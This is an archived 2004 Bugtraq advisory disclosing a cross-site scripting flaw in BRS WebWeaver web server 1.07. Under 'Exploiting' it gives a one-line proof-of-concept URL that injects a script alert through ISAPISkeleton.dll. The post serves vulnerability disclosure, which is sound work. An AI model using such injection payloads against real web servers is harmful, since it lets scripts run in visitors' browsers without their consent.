BRS WebWeaver Webserver Cross Site Scripting Vulnerability

From: Oliver Karow (oliver.karow_at_gmx.de)
Date: 01/28/04

Next message: Pete Finnigan: "Oracle toplink mapping workbench password algorithm"

Previous message: KF: "SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 28 Jan 2004 12:34:45 +0100
To: bugtraq@securityfocus.com

BRS WebWeaver Webserver Cross Site Scripting Vulnerability
================================================

Whatis:
=====

BRS WebWeaver is a free personal web server that runs on the Windows
platform.

Version:
======

V 1.07

Exploiting:
=======

http://127.0.0.1/scripts/ISAPISkeleton.dll?>alert("Ooops!")</script>

Vendor:
======

http://www.brswebweaver.com

Credit:
=====

www.oliverkarow.de

Next message: Pete Finnigan: "Oracle toplink mapping workbench password algorithm"

Previous message: KF: "SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

www.derkeiler.com > Mailing-Lists > securityfocus > bugtraq > 2004-01